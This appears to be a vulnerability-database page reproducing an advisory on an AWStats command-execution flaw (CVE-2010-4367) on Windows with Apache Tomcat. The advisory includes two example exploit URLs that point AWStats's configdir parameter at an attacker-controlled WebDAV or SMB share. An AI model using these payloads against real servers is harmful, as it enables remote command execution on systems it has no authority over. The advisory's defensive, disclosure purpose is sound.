Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2010-4367

Publish Date: 30 Nov 2010

                							

                source: http://www.securityfocus.com/bid/45123/info

Awstats is prone to an arbitrary command-execution vulnerability. This issue occurs when Awstats is used along with Apache Tomcat in Microsoft Windows.

An attacker can exploit this vulnerability to execute arbitrary shell commands in the context of the webserver process. This may help attackers compromise the underlying system; other attacks are also possible.

AWStats 6.95 and prior versions are vulnerable. 

Attacking Windows XP Apache Tomcat AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&amp;pluginmode=rawlog&amp;configdir=\\Attacker-IPAddress:80\webdav

Attacking Windows 2003 or Windows XP AWStats Server:
http://www.example.com/cgi-bin/awstats.cgi?config=attacker&amp;pluginmode=rawlog&amp;configdir=\\Attacker-IPAddress\SMB-Share

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

AWStats 6.x - Apache Tomcat Configuration File Arbitrary Command Execution

Vulmon Search

About

Products

Connect